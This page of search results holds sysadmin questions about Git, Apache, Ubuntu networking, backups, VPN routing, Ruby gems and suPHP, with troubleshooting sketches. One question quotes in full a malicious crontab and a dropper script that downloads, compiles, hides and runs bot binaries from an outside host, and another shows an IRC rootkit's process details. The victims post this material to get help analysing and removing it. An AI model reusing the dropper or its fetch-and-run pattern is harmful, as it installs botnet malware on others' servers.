Search Results

Search found 23811 results on 953 pages for 'javax script'.

  • Can't install Git

    - by davemc
    I'm following the tutorial below to install Git: https://help.github.com/articles/set-up-git However, when I get to the end, where I need to install the helper into the same directory where Git itself is installed, I get the following error: Davids-iMac:~ davidcavanagh$ which git /usr/bin/git Davids-iMac:~ davidcavanagh$ sudo mv git-credential-osxkeychain /usr/bin mv: rename git-credential-osxkeychain to /usr/bin/git-credential-osxkeychain: No such file or directory Davids-iMac:~ davidcavanagh$ Edit: I am now getting the following error when I install Git and then run git -version: Davids-iMac:~ davidcavanagh$ git -version /usr/bin/git: line 1: syntax error near unexpected token `newline' /usr/bin/git: line 1: `<?xml version="1.0" encoding="UTF-8"?>' I have also tried using Homebrew, and I get the following error when I do: Davids-iMac:~ davidcavanagh$ ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)" ==> This script will install: /usr/local/bin/brew /usr/local/Library/... /usr/local/share/man/man1/brew.1 Press ENTER to continue or any other key to abort ==> Downloading and Installing Homebrew... Failed during: git init -q Can anyone help? Thanks
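
    A hedged diagnostic sketch (not from the original thread): a shell syntax error on '<?xml ...>' means /usr/bin/git is not a binary at all but an XML placeholder file, so the mv failure and the Homebrew failure both follow from a broken Git install rather than from the credential helper. (As an aside, the flag is --version with two dashes, though the XML error would appear either way.) Checking what the file really is narrows things down:

        # An XML file here means this is not git at all; reinstall from git-scm.com
        file /usr/bin/git
        head -n 1 /usr/bin/git

        # After a clean reinstall, confirm the location, then drop the helper beside it
        which git
        sudo mv git-credential-osxkeychain "$(dirname "$(which git)")"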

  • Apache 2.4 + PHP-FPM + ProxyPassMatch

    - by apfelbox
    I recently installed Apache 2.4 on my local machine, together with PHP 5.4.8 using PHP-FPM. Everything went quite smoothly (after a while...) but there is still a strange error: I configured Apache for PHP-FPM like this: <VirtualHost *:80> ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" ProxyPassMatch ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 </VirtualHost> It works; for example, if I call http://localhost/info.php I get the correct phpinfo() (it is just a test file). If I call a directory, however, I get a 404 with the body File not found. and in the error log: [Tue Nov 20 21:27:25.191625 2012] [proxy_fcgi:error] [pid 28997] [client ::1:57204] AH01071: Got error 'Primary script unknown\n' Update I now tried doing the proxying with mod_rewrite: <VirtualHost *:80> ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 [L,P] </VirtualHost> But the problem is that it always redirects, because a request for http://localhost/ automatically becomes a request for http://localhost/index.php due to DirectoryIndex index.php index.html Update 2 Ok, so I thought "maybe check whether there is a file to give to the proxy first": <VirtualHost *:80> ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} -f RewriteRule ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 [L,P] </VirtualHost> Now the complete rewriting does not work anymore... Update 3 Now I have this solution: ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" RewriteEngine on RewriteCond /Users/apfelbox/WebServer/%{REQUEST_FILENAME} -f RewriteRule ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 [L,P] First check that there is a file to pass to PHP-FPM (with the full and absolute path) and then do the rewriting. This does not work when using URL rewriting inside a subdirectory, and it also fails for URLs like http://localhost/index.php/test/ So back to square one. Any ideas?
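
    One pattern worth trying (a sketch, assuming Apache 2.4.10 or later, where mod_proxy_fcgi gained SetHandler support): hand .php files to FPM per-file instead of via ProxyPassMatch, which sidesteps the rewrite-ordering problem entirely because only requests that really map to a .php file on disk are proxied:

        <VirtualHost *:80>
            ServerName localhost
            DocumentRoot "/Users/apfelbox/WebServer"
            DirectoryIndex index.php index.html

            # Only files that actually exist on disk are handed to PHP-FPM;
            # everything else falls through to the normal 404 handling.
            <FilesMatch "\.php$">
                SetHandler "proxy:fcgi://127.0.0.1:9000"
            </FilesMatch>
        </VirtualHost>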

  • Networking stopped working on Ubuntu

    - by 1337Rooster
    I installed Ubuntu 10.04 through the Wubi installer (funny, I installed it today and thought I would have gotten 10.10). I had a network connection and everything was working fine. I rebooted my computer a couple of times and then suddenly I could not connect to the network, and when I click the wireless/networking icon it says "Networking Disabled". I reinstalled Ubuntu and the problem went away. After a few reboots the problem returned. I have tried restarting to see if it would come back, as well as a few other things listed below. Any other suggestions would be appreciated. Tried to restart networking via /etc/init.d/networking: amato@ubuntu:~$ sudo /etc/init.d/networking restart * Reconfiguring network interfaces... Ignoring unknown interface eth0=eth0. [ OK ] Tried to stop and start it: amato@ubuntu:~$ sudo /etc/init.d/networking stop * Deconfiguring network interfaces... [ OK ] amato@ubuntu:~$ amato@ubuntu:~$ sudo /etc/init.d/networking start Rather than invoking init scripts through /etc/init.d, use the service(8) utility, e.g. service networking start Since the script you are attempting to invoke has been converted to an Upstart job, you may also use the start(8) utility, e.g. start networking networking stop/waiting Tried start networking: amato@ubuntu:~$ start networking start: Rejected send message, 1 matched rules; type="method_call", sender=":1.58" (uid=1000 pid=2241 comm="start) interface="com.ubuntu.Upstart0_6.Job" member="Start" error name="(unset)" requested_reply=0 destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init")) amato@ubuntu:~$ sudo start networking networking stop/waiting Tried service networking restart: amato@ubuntu:~$ service networking restart restart: Rejected send message, 1 matched rules; type="method_call", sender=":1.60" (uid=1000 pid=2248 comm="restart) interface="com.ubuntu.Upstart0_6.Job" member="Restart" error name="(unset)" requested_reply=0 destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init")) amato@ubuntu:~$ sudo service networking restart restart: Unknown instance: Here are the contents of my /etc/network/interfaces: auto lo iface lo inet loopback I even tried to modify it to this (based on something I read online; not sure I was doing the right thing here). Tried everything again and no luck: auto lo eth0 iface lo inet loopback iface eth0 inet dhcp
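
    One thing worth checking (a hedged guess, not from the original post): on 10.04 the "Networking Disabled" message comes from NetworkManager, not from /etc/init.d/networking, and NetworkManager remembers that flag across reboots in a state file. Resetting it looks roughly like this:

        # Does NetworkManager think networking is administratively off?
        cat /var/lib/NetworkManager/NetworkManager.state

        # Flip the flag back and restart the daemon
        sudo sed -i 's/NetworkingEnabled=false/NetworkingEnabled=true/' \
            /var/lib/NetworkManager/NetworkManager.state
        sudo service network-manager restart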

  • Watchguard Firewall WebBlocker Regular Expression for Multiple Domains?

    - by Eric
    I'm pretty sure this is really a regex question, so you can skip to REGEX QUESTION if you want to skip the background. Our primary firewall is a Watchguard X750e running Fireware XTM v11.2. We're using WebBlocker to block most of the categories, and I'm allowing needed sites as they arise. Some sites are simple to add as exceptions, like Pandora radio. That one is just a pattern-matched exception with "pandora.com/" as the pattern. All traffic from anywhere on pandora.com is allowed. I'm running into trouble on more sophisticated domains that reference content off of their base domains. We'll take Grooveshark as an example. If you go to http://grooveshark.com/ and view the page source, you'll see hrefs referring to gs-cdn.net as well as grooveshark.com. So adding a WebBlocker exception for grooveshark.com/ is not effective, and I have to add a second rule allowing gs-cdn.net/ as well. I see that WebBlocker allows regex rules, so what I'd like to do in situations like this is create a single regex rule that allows traffic to all the needed domains. REGEX QUESTION: I'd like to try a regex that matches grooveshark.com/ and gs-cdn.net/. If anybody can help me write that regex, I'd appreciate it. Here is what is in the WatchGuard documentation from that section: Regular expression Regular expression matches use a Perl-compatible regular expression to make a match. For example, .[onc][eor][gtm] matches .org, .net, .com, or any other three-letter combination of one letter from each bracket, in order. Be sure to drop the leading “http://” Supports wild cards used in shell script. For example, the expression “(www)?.watchguard.[com|org|net]” will match URL paths including www.watchguard.com, www.watchguard.net, and www.watchguard.org. Thanks all!
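
    A regex along these lines should cover both domains in one rule (hedged: WebBlocker's exact matching semantics may differ slightly, and remember to drop the leading http://). The optional host prefix also catches subdomains such as images.grooveshark.com:

        ^([^/]*\.)?(grooveshark\.com|gs-cdn\.net)/

    A quick sanity check with a PCRE-capable grep:

        echo 'grooveshark.com/stream'      | grep -P '^([^/]*\.)?(grooveshark\.com|gs-cdn\.net)/'
        echo 'www.gs-cdn.net/static/x.js'  | grep -P '^([^/]*\.)?(grooveshark\.com|gs-cdn\.net)/'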

  • Mounting an Azure blob container in a Linux VM Role

    - by djechelon
    I previously asked a question about this topic, but now I prefer to rewrite it from scratch because I was very confused back then. I currently have a Linux XS VM Role in Azure. I basically want to create a self-managed, evolved hosting service using VMs rather than Azure's more expensive Web Roles. I also want to take advantage of load balancing (between VM Roles) and geo-replication (of Storage Roles), making sure that the "web files" of customers are located in a defined and manageable place. One way I found to "mount" a drive in a Linux VM is described here and involves mounting a VHD onto the virtual machine. From what I could learn, the VHD is reliably stored in a storage role, and is exclusively locked by the VM that uses it. Once the VM Role has its drive I can format the partition to any size I want. I don't want that!! I would like each hosted site to have its own blob directory, and then each replicated/load-balanced VM Role to mount that blob directory read-write, NFS-style, to read HTML and script files. The database is obviously courtesy of Microsoft :) My question is: Is it possible to actually mount a blob storage container into a directory in the Linux FS? Is it possible in Windows Server 2008?

  • Pain removing a perl rootkit

    - by paul.ago
    So, we host a geoservice webserver thing at the office. Someone apparently broke into this box (probably via FTP or SSH) and installed some kind of IRC-managed rootkit. Now I'm trying to clean the whole thing up. I found the PID of the process that tries to connect via IRC, but I can't figure out what the invoking process is (I already looked with ps, pstree and lsof). The process is a perl script owned by the www user, but ps aux | grep displays a fake file path in the last column. Is there another way to trace that PID and catch the invoker? Forgot to mention: the kernel is 2.6.23, which is exploitable to become root, but I can't touch this machine too much, so I can't upgrade the kernel. EDIT: lsof might help: lsof -p 9481

        COMMAND PID  USER FD  TYPE DEVICE SIZE    NODE      NAME
        perl    9481 www  cwd DIR  8,2    608     2         /
        perl    9481 www  rtd DIR  8,2    608     2         /
        perl    9481 www  txt REG  8,2    1168928 38385     /usr/bin/perl5.8.8
        perl    9481 www  mem REG  8,2    135348  23286     /lib64/ld-2.5.so
        perl    9481 www  mem REG  8,2    103711  23295     /lib64/libnsl-2.5.so
        perl    9481 www  mem REG  8,2    19112   23292     /lib64/libdl-2.5.so
        perl    9481 www  mem REG  8,2    586243  23293     /lib64/libm-2.5.so
        perl    9481 www  mem REG  8,2    27041   23291     /lib64/libcrypt-2.5.so
        perl    9481 www  mem REG  8,2    14262   23307     /lib64/libutil-2.5.so
        perl    9481 www  mem REG  8,2    128642  23303     /lib64/libpthread-2.5.so
        perl    9481 www  mem REG  8,2    1602809 23289     /lib64/libc-2.5.so
        perl    9481 www  mem REG  8,2    19256   38662     /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/IO/IO.so
        perl    9481 www  mem REG  8,2    21328   38877     /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/Socket/Socket.so
        perl    9481 www  mem REG  8,2    52512   23298     /lib64/libnss_files-2.5.so
        perl    9481 www  0r  FIFO 0,5            1068892   pipe
        perl    9481 www  1w  FIFO 0,5            1071920   pipe
        perl    9481 www  2w  FIFO 0,5            1068894   pipe
        perl    9481 www  3u  IPv4 130646198      TCP       192.168.90.7:60321->www.**.net:ircd (SYN_SENT)
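
    The /proc filesystem is much harder for a userland process to fake than the ps command line, so chasing the PID from there is a reasonable next step (a hedged sketch; the PID is the one from the lsof output above):

        # Real executable, working directory and command line, straight from the kernel
        ls -l /proc/9481/exe /proc/9481/cwd
        tr '\0' ' ' < /proc/9481/cmdline; echo

        # Parent PID, then repeat the same inspection one level up
        awk '/^PPid:/ {print $2}' /proc/9481/status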

  • CA SiteMinder Configuration for Ubuntu

    - by Matt Franklin
    I receive the following error when attempting to start Apache through the init.d script: apache2: Syntax error on line 186 of /etc/apache2/apache2.conf: Syntax error on line 4 of /etc/apache2/mods-enabled/auth_sm.conf: Cannot load /apps/netegrity/webagent/bin/libmod_sm22.so into server: libsmerrlog.so: cannot open shared object file: No such file or directory SiteMinder does not officially support Ubuntu, so I am having trouble finding any configuration documentation to help me troubleshoot this issue. I successfully installed the SiteMinder binaries and registered the trusted host with the server, but I am having trouble getting the Apache mod to load correctly. I have added the following lines to a new auth_sm.conf file in /etc/apache2/mods-available and symlinked to it in /etc/apache2/mods-enabled:

        SetEnv LD_LIBRARY_PATH /apps/netegrity/webagent/bin
        SetEnv PATH ${PATH}:${LD_LIBRARY_PATH}
        LoadModule sm_module /apps/netegrity/webagent/bin/libmod_sm22.so
        SmInitFile "/etc/apache2/WebAgent.conf"
        Alias /siteminderagent/pwcgi/ "/apps/netegrity/webagent/pw/"
        <Directory "/apps/netegrity/webagent/pw/">
            Options Indexes MultiViews ExecCGI
            AllowOverride None
            Order allow,deny
            Allow from all
        </Directory>

    UPDATE: Output of ldd libmod_sm22.so:

        ldd /apps/netegrity/webagent/bin/libmod_sm22.so
            linux-gate.so.1 => (0xb8075000)
            libsmerrlog.so => /apps/netegrity/webagent/bin/libsmerrlog.so (0xb7ec0000)
            libsmeventlog.so => /apps/netegrity/webagent/bin/libsmeventlog.so (0xb7ebb000)
            libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb7e9a000)
            libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb7e96000)
            librt.so.1 => /lib/tls/i686/cmov/librt.so.1 (0xb7e8d000)
            libstdc++.so.5 => /usr/lib/libstdc++.so.5 (0xb7dd3000)
            libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb7dad000)
            libgcc_s.so.1 => /lib/libgcc_s.so.1 (0xb7d9e000)
            libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7c3a000)
            libsmcommonutil.so => /apps/netegrity/webagent/bin/libsmcommonutil.so (0xb7c37000)
            /lib/ld-linux.so.2 (0xb8076000)

    UPDATE: The easiest way to set environment variables for the Apache run user in Ubuntu is to edit the /etc/apache2/envvars file and add export statements for any library paths you may need.
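
    As the final update says, SetEnv is the wrong tool here: it only sets variables for CGI children, while LD_LIBRARY_PATH has to be visible to the dynamic loader before LoadModule runs, which is why libsmerrlog.so (a dependency of libmod_sm22.so, per the ldd output) is not found. The concrete change is roughly (a sketch):

        # /etc/apache2/envvars -- sourced by apache2ctl before the server starts
        export LD_LIBRARY_PATH=/apps/netegrity/webagent/bin:$LD_LIBRARY_PATH

    followed by a full stop and start of Apache so the new environment is picked up.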

  • Fetching e-mails into Redmine via IMAP

    - by Danilo Bargen
    I'm trying to fetch e-mails into Redmine via IMAP. The e-mails I'm generating look like this: FooBar Ltd 123456 http://example.com/Foobar-Ltd-123456.html Project: backend Tracker: Dataerror Beschreibung: This is the description =========================== CLIENT_IP: 192.168.1.215 HTTP_USER_AGENT: mozilla/asdfjköl I try to fetch them into Redmine via this command: rake -f /var/www/projects/redmine/Rakefile redmine:email:receive_imap \ RAILS_ENV="production" host=example.com port=993 ssl=true username=redmine \ password=1234 project=myproject tracker=other \ allow_override=project,tracker,category,priority \ move_on_success=read move_on_failure=failed But the e-mails get moved into the failed folder. I had this setup running some time ago with a different e-mail generator but pretty much the same template, and I can't figure out why it's not working. The permissions seem to be OK too. In order to further debug this issue, I need some logfiles. Are there any logfiles written by this command? Or are there any other suggestions to solve this issue? My environment: danilo@jabba:/var/www/projects/redmine$ RAILS_ENV=production script/about About your application's environment Ruby version 1.8.7 (i486-linux) RubyGems version 1.3.5 Rack version 1.0 Rails version 2.3.5 Active Record version 2.3.5 Active Resource version 2.3.5 Action Mailer version 2.3.5 Active Support version 2.3.5 Application root /var/www/projects/redmine Environment production Database adapter mysql Database schema version 20100819172912
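
    A hedged debugging sketch: the rake task itself logs very little, but the Rails production log usually records why the MailHandler rejected a message (unknown sender, missing project, keyword parsing), and Redmine also ships a redmine:email:read task that reads a single message from stdin so one failure can be watched directly:

        # Watch the application log while the fetch runs
        tail -f /var/www/projects/redmine/log/production.log

        # Re-feed one message from the "failed" IMAP folder by hand (task name assumed;
        # check "rake -T | grep email" for what your version provides)
        rake -f /var/www/projects/redmine/Rakefile redmine:email:read \
            RAILS_ENV=production project=myproject tracker=other < failed_message.eml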

  • Windows Server Backup - Recover only shows the latest backup

    - by Steffen
    We're having quite some trouble at work using Windows Server Backup. We have a Hyper-V server (Win 2008) running 8 virtual web servers, running a variety of OSes: Win 2003, Win 2008 and a lone Debian. Each virtual server has a separate partition on the physical Hyper-V server, so e.g. E: is virtual server #1, F: is #2 and so forth. For backup we use Windows Server Backup, or more exactly the command-line tool wbadmin.exe. We need to make the backups without stopping the virtual servers, as we cannot afford the downtime (we've got users online both day and night), and Windows Server Backup offers the shadow copy provider to achieve this. We run wbadmin like this: wbadmin start backup -backuptarget:\\remotebackuplocation\somefolder -include:E: -quiet We run it once per partition, because we've got a script wrapped around that command for sending us an email about how it went. Each time wbadmin runs, it deletes the Backup xxxx folder it created during the last backup and creates a new one. To prevent this, we rename the Backup xxxx folder after each backup run, before starting the next one. I realize we must rename it back to its original name prior to recovering, and we obviously do this. Now the issue is as follows: even though we have all the backed-up files, and rename whichever backup we want to use back to its original name, we can only see the latest backup in the Windows Server Backup GUI when we select "Recover". This means we can only recover the last partition we backed up, so e.g. E: can never be recovered. In other words, we're screwed :-( My question is: does anyone know how to use Windows Server Backup for a scenario like this? Or is it simply not possible due to the simplicity of Windows Server Backup? If it's not possible, could you recommend some backup software for this purpose? We've already looked at MS' System Center Data Protection Manager, however it's quite expensive and the boss doesn't like that :-/
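
    A hedged workaround sketch: wbadmin itself can list and restore any version present at the target, so the GUI's single-backup view need not be the end of the road. After renaming a backup folder back to its original name:

        rem List every backup version visible at the target
        wbadmin get versions -backupTarget:\\remotebackuplocation\somefolder

        rem Restore volume E: using a version identifier from the list above
        wbadmin start recovery -version:03/31/2010-09:00 -itemType:Volume ^
            -items:E: -backupTarget:\\remotebackuplocation\somefolder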

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] The contents of http://stablehost.us/bots/regular.bot are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask him about this. It seems this script downloads some remote C source code and binaries, compiles them and executes them. I am a web developer, not an expert in C, but looking at the downloaded files it seems to be a bot injected into the server's cron. Can you give me more information about what this code does, how it works and what its purpose is?
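
    To answer the first question: yes, this is malicious. regular.bot is a dropper: run as root it installs compiler tools, fetches an IRC bot as C source plus two prebuilt binaries, hides them as /lib/xpath.so*, and runs them; as an unprivileged user it does the same in the current directory as hidden .php* files. A containment sketch (hedged; a compromised host ultimately needs a rebuild, since nothing on it can be trusted):

        # Remove persistence and payloads
        crontab -l | grep -v '/dev/shm/tmp/.rnd' | crontab -
        rm -f /dev/shm/tmp/.rnd /lib/xpath.so /lib/xpath.so.1 /lib/xpath.so.2

        # Kill anything still running from those paths
        pkill -f 'xpath\.so'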

  • routing table permissions under Windows 7 and openvpn

    - by pilcrow
    My OpenVPN client, 32-bit OpenVPN 2.1.1 on 64-bit Windows 7 Pro, cannot accept routes pushed to it by my remote endpoint OpenVPN server. This happens even if I invoke OpenVPN as a member of Administrators, and whether or not I've specified script-security 2 (as suggested by another question here). Mon Mar 29 12:57:19 2010 Notified TAP-Win32 driver to set a DHCP IP/netmask of 192.168.254.3/255.255.255.0 on interface {8BE2E9CF-F4C9-4A5E-98FD-E12DF1B6C3A4} [DHCP-serv: 192.168.254.3, lease-time: 86400] Mon Mar 29 12:57:19 2010 NOTE: FlushIpNetTable failed on interface [14] {GUID} (status=5) : Access is denied. Mon Mar 29 12:57:24 2010 TEST ROUTES: 8/8 succeeded len=8 ret=1 a=0 u/d=up Mon Mar 29 12:57:24 2010 C:\WINDOWS\system32\route.exe ADD 172.20.1.0 MASK 255.255.255.0 192.168.254.1 Mon Mar 29 12:57:24 2010 ROUTE: route addition failed using CreateIpForwardEntry: Access is denied. [status=5 if_index=14] Mon Mar 29 12:57:24 2010 Route addition via IPAPI failed [adaptive] Mon Mar 29 12:57:24 2010 Route addition fallback to route.exe Mon Mar 29 12:57:24 2010 ERROR: Windows route add command failed [adaptive]: returned error code 1 ... and so on for each specific route the server pushes out. It doesn't seem right to me that the administrative user, the one configured at Windows 7 install time, should need further privileges. What am I missing?
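
    One likely culprit (hedged): on Windows 7, membership in Administrators is not enough. UAC hands every process a filtered token unless it is actually elevated, and both FlushIpNetTable and CreateIpForwardEntry need the elevated token, which matches the two "Access is denied" lines above. A quick test (config file name is a placeholder):

        rem From a cmd.exe started via right-click "Run as administrator"
        cd "C:\Program Files (x86)\OpenVPN\config"
        openvpn --config client.ovpn

        rem Permanent fix: openvpn-gui.exe -> Properties -> Compatibility ->
        rem "Run this program as an administrator"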

  • IIS 7.5 How to disable "Verify File Exists" for siteminder handler

    - by HariM
    We are trying to use ASP.NET MVC with SiteMinder for single sign-on, on Windows Server 2008 R2 with IIS 7.5 and SiteMinder agent version 6QMR6. Problem: SiteMinder protects physical files that exist, but it does not protect the folder when we try to access a nonexistent file; it must redirect to the login page even if the file doesn't exist when the user is accessing a protected folder. How do I configure IIS 7.5 so that it does not verify a file exists before SiteMinder authentication? SiteMinderWebAgent is a handler (wildcard script map) we created using ISAPI6WebAgent.dll. How do I protect ASP.NET MVC requests with SiteMinder? (Added this as my previous question did not solve the problem: the MVC request shows up in the IIS log but not in the SiteMinder log.) Update: Microsoft Support says IIS 7.5, like earlier versions, doesn't support wildcard mappings on two ISAPI handlers that both register a bare * wildcard. Currently in my case SiteMinder has a * wildcard and ASP.NET MVC (handler aspnet_isapi) has a * wildcard to handle the requests, and ordered priority doesn't help in that case. I'm not convinced by the answer, but will wait until tomorrow for them to get back to me.
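
    For the "verify file exists" part specifically, the IIS 7.5 knob is the handler mapping's Request Restrictions: untick "Invoke handler only if request is mapped to" a file or folder, which corresponds to resourceType="Unspecified" on the handler element. A hedged appcmd sketch (handler name taken from above; the collection-edit syntax may need adjusting for your setup):

        %windir%\system32\inetsrv\appcmd.exe set config ^
            -section:system.webServer/handlers ^
            "/[name='SiteMinderWebAgent'].resourceType:Unspecified"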

  • therubyracer on Ubuntu install issues with ruby-2.0.0-p247

    - by Victor S
    I can't seem to get the therubyracer gem installed on Ubuntu; I get the following errors. Can anyone help? ERROR: Error installing therubyracer: ERROR: Failed to build gem native extension. /home/victorstan/.rvm/rubies/ruby-2.0.0-p247/bin/ruby extconf.rb checking for main() in -lpthread... yes creating Makefile make compiling constraints.cc compiling array.cc compiling value.cc compiling invocation.cc compiling primitive.cc compiling trycatch.cc compiling context.cc compiling exception.cc compiling template.cc compiling accessor.cc compiling object.cc compiling script.cc compiling external.cc compiling stack.cc compiling gc.cc compiling backref.cc compiling heap.cc compiling v8.cc compiling constants.cc compiling date.cc compiling function.cc compiling rr.cc compiling message.cc compiling init.cc compiling string.cc compiling handles.cc compiling signature.cc compiling locker.cc linking shared-object v8/init.so g++: /home/victorstan/.rvm/gems/ruby-2.0.0-p247@global/gems/libv8-3.11.8.17-x86_64-linux/vendor/v8/out/ia32.release/obj.target/tools/gyp/libv8_base.a: No such file or directory g++: /home/victorstan/.rvm/gems/ruby-2.0.0-p247@global/gems/libv8-3.11.8.17-x86_64-linux/vendor/v8/out/ia32.release/obj.target/tools/gyp/libv8_snapshot.a: No such file or directory make: *** [init.so] Error 1 Update It seems it's trying to use a 32-bit library instead of a 64-bit one. Has anyone else seen Ubuntu pull in the 32-bit version when installing 64-bit applications and packages (even though the system is 64-bit Linux)? Related: https://github.com/cowboyd/therubyracer/issues/262
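
    The usual fix reported for this (a hedged sketch): the prebuilt libv8 binary gem that got pulled in only ships the ia32 objects, so force libv8 to build against a system copy of V8 instead, then reinstall therubyracer:

        # Assumes Ubuntu's V8 development package is acceptable for your app
        sudo apt-get install libv8-dev
        gem uninstall libv8
        gem install libv8 -v 3.11.8.17 -- --with-system-v8
        gem install therubyracer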

  • Django running on Apache+WSGI and apache SSL proxying

    - by Lessfoe
    Hi all, I'm trying to rewrite all requests to my Django server, which runs on Apache+WSGI inside my local network and is configured as in the WSGI wiki how-to, except that I set up a virtualhost for it. The server from which I want to rewrite requests is another Apache server listening on port 80. I can get it to work well as long as I don't make SSL the required way to connect. But I need all requests to the Django server encrypted with SSL, so I used this directive to achieve that (on my public webserver): Alias /dirname "/var/www/dirname" SSLVerifyClient none SSLOptions +FakeBasicAuth SSLRequireSSL AuthName "stuff name" AuthType Basic AuthUserFile /etc/httpd/djangoserver.passwd require valid-user # redirect all request to django.test:80 RewriteEngine On RewriteRule (.*)$ http://django.test/$1 [P] This configuration works if I load a specific page through the external server from my browser. It does not work when clicking my Django application URLs (even though the URL looks correct when I hover over it). The URL my public server tries to serve uses http (instead of https), and the directory "dirname" I specified in my Apache configuration disappears, so it says the page was not found. I think it depends on Django and its WSGI handler. Has anybody run into the same problem? PS: I have already tried to modify the WSGI script. I'm using Django 1.0.3, Apache 2.2 on Fedora 10 (inside), Apache 2.2 on the public server. Thanks in advance for your help. Fab
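
    The http:// links and the vanishing /dirname prefix smell like backend redirects leaking through: the [P] flag proxies the request, but nothing rewrites the Location headers Django sends back (its APPEND_SLASH redirects, for example). ProxyPassReverse exists for exactly that; a hedged sketch for the public server, assuming the backend serves the site at its root:

        <Location /dirname/>
            SSLRequireSSL
            ProxyPass        http://django.test/
            ProxyPassReverse http://django.test/
        </Location>

    Django 1.0 predates SECURE_PROXY_SSL_HEADER, so if the application itself has to generate https:// links with the /dirname prefix, that still needs handling on the Django side.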

  • How to disable windows server 2008 timestamp response

    - by Cal
    Posted this question on Stack Overflow but was instructed to post it here: I was using Rapid7's Nexpose to scan one of our web servers (Windows Server 2008) and got a vulnerability for timestamp response. According to Rapid7, timestamp response shall be disabled: http://www.rapid7.com/db/vulnerabilities/generic-tcp-timestamp So far I have tried several things: Edit the registry: add a "Tcp1323Opts" value to HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters and set it to 0. http://technet.microsoft.com/en-us/library/cc938205.aspx Use this command: netsh int tcp set global timestamps=disabled Tried this PowerShell command: Set-netTCPsetting -SettingName InternetCustom -Timestamps disabled (got the error: Set-netTCPsetting : The term 'Set-netTCPsetting' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.) None of the above attempts was successful; after a re-scan we still got the same alert. Rapid7 suggested using a firewall capable of blocking it, but we want to know if there is a setting in Windows to achieve it. Is it through a specific port? If yes, what is the port number? If not, could you suggest a third-party firewall that is capable of blocking it? Thank you very much.
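
    One detail worth double-checking (hedged): Tcp1323Opts only takes effect after a reboot, and it must be a REG_DWORD. The scriptable form of the registry edit is:

        reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters ^
            /v Tcp1323Opts /t REG_DWORD /d 0 /f
        shutdown /r /t 0

    Even then, some Windows versions still echo timestamps when the remote end offers them first, which is presumably why Rapid7 falls back to recommending a blocking firewall.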

  • Trying to run chrooted suPHP with UserDir, getting 500 server error

    - by Greg Antowski
    I've managed to get suPHP working fine with UserDir (i.e. PHP files run from /home/$username/public_html), but I can't get it to work when I chroot it to the user's home directory. I've been following this guide: http://compilefailure.blogspot.co.nz/2011/09/suphp-chroot-gotchas.html and adapting it to my needs. I'm not creating vhosts; I just want PHP scripts to be jailed to the user's home directory. I've gotten to the part where you use makejail and set up a symlink. However, even with the symlink set up correctly, PHP scripts won't run. This is what's shown in the Apache error log: SoftException in Application.cpp:537: Could not execute script "/home/jimmy/public_html/test.php" [error] [client 127.0.0.1] Caused by SystemException in API_Linux.cpp:444: execve() for program "/usr/bin/php-cgi" failed: No such file or directory The thing is, if I try running either of the following commands in the terminal, it works without any issues: /home/jimmy/usr/bin/php-cgi /home/jimmy/public_html/test.php /usr/bin/php-cgi /home/jimmy/public_html/test.php I've been trying for hours to get this going, and documentation for this kind of stuff is almost non-existent. If anyone could help me out with this, I'd be extremely grateful.
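
    A hedged reading of the error: inside the chroot, "No such file or directory" from execve() means /usr/bin/php-cgi, one of its shared libraries, or its ELF interpreter does not exist under the jail (running it from outside works because the real /usr/bin is visible there). Replicating the binary plus everything ldd reports, preserving paths, looks roughly like:

        JAIL=/home/jimmy
        mkdir -p "$JAIL/usr/bin"
        cp /usr/bin/php-cgi "$JAIL/usr/bin/"

        # Copy every shared library php-cgi needs into the same paths inside the jail
        for lib in $(ldd /usr/bin/php-cgi | grep -o '/[^ ]*'); do
            mkdir -p "$JAIL$(dirname "$lib")"
            cp "$lib" "$JAIL$(dirname "$lib")"
        done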

  • Installing ikiwiki on nginx - fastcgi/fcgi wrapper

